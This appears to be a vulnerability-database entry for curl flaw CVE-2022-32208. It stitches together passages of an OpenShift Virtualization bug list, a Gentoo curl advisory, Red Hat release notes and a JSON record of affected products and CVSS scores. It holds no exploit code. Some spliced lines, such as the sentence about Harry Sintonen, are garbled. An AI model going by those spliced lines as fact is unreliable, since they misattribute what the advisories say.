2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA complaint
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registery input add docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template prameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if click the create button quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user cant reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when try get instancestypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
-
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922 [ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923 [ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925 [ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926 [ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945 [ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946 [ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947 [ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576 [ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774 [ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775 [ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776 [ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779 [ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780 [ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781 [ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782 [ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115 [ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205 [ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206 [ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207 [ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208 [ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221 [ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252 [ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260 [ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915 [ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . Bugs fixed (https://bugzilla.redhat.com/):
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/
Security fixes:
- moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)
- vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fixes:
-
Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters (BZ# 2074547)
-
OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constrain (BZ# 2082254)
-
subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec (BZ# 2083659)
-
Yaml editor for creating vSphere cluster moves to next line after typing (BZ# 2086883)
-
Submariner addon status doesn't track all deployment failures (BZ# 2090311)
-
Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret (BZ# 2091170)
-
After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors (BZ# 2095481)
-
Enforce failed and report the violation after modified memory value in limitrange policy (BZ# 2100036)
-
Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)" (BZ# 2101577)
-
Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies (BZ# 2102273)
-
managed cluster is in "unknown" state for 120 mins after OADP restore
-
RHACM 2.5.2 images (BZ# 2104553)
-
Subscription UI does not allow binding to label with empty value (BZ# 2104961)
-
Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ# 2106069)
-
Region information is not available for Azure cloud in managedcluster CR (BZ# 2107134)
-
cluster uninstall log points to incorrect container name (BZ# 2107359)
-
ACM shows wrong path for Argo CD applicationset git generator (BZ# 2107885)
-
Single node checkbox not visible for 4.11 images (BZ# 2109134)
-
Unable to deploy hypershift cluster when enabling validate-cluster-security (BZ# 2109544)
-
Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application (BZ# 20110026)
-
After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating (BZ# 2117728)
-
pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)
-
ArgoCD and AppSet Applications do not deploy to local-cluster (BZ# 2124707)
-
Bugs fixed (https://bugzilla.redhat.com/):
2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters 2082254 - OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constraint 2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec 2086883 - Yaml editor for creating vSphere cluster moves to next line after typing 2090311 - Submariner addon status doesn't track all deployment failures 2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret 2095481 - After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors 2100036 - Enforce failed and report the violation after modified memory value in limitrange policy 2101577 - Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)" 2102273 - Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies 2103653 - managed cluster is in "unknown" state for 120 mins after OADP restore 2104553 - RHACM 2.5.2 images 2104961 - Subscription UI does not allow binding to label with empty value 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD 2107134 - Region information is not available for Azure cloud in managedcluster CR 2107359 - cluster uninstall log points to incorrect container name 2107885 - ACM shows wrong path for Argo CD applicationset git generator 2109134 - Single node checkbox not visible for 4.11 images 2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application 2117728 - After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating 2122292 - pods in CrashLoopBackoff on 3.11 managed cluster 2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.16.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "13.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.84.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
}
],
"trust": 0.6
},
"cve": "CVE-2022-32208",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2022-32208",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-424135",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2022-32208",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32208",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32208",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-424135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"description": {
"_id": null,
"data": "When curl \u003c 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2022:6159-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:6159\nIssue date: 2022-08-24\nCVE Names: CVE-2022-32206 CVE-2022-32208\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: HTTP compression denial of service (CVE-2022-32206)\n\n* curl: FTP-KRB bad message verification (CVE-2022-32208)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\ncurl-7.61.1-22.el8_6.4.src.rpm\n\naarch64:\ncurl-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\n\nppc64le:\ncurl-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\n\ns390x:\ncurl-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.s390x.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\n\nx86_64:\ncurl-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.i686.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+\nYgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg\nEiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB\ndQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN\nblR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau\n5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k\nnJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+\nXPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd\nVaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas\nML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw\nowX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF\nbBkTeh+fqsg=powM\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.12 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity fix:\n\n* CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\nBug fixes:\n\n* Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)\n\n* RHACM 2.3.12 images (BZ# 2101411)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation\n2101411 - RHACM 2.3.12 images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\n5. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via 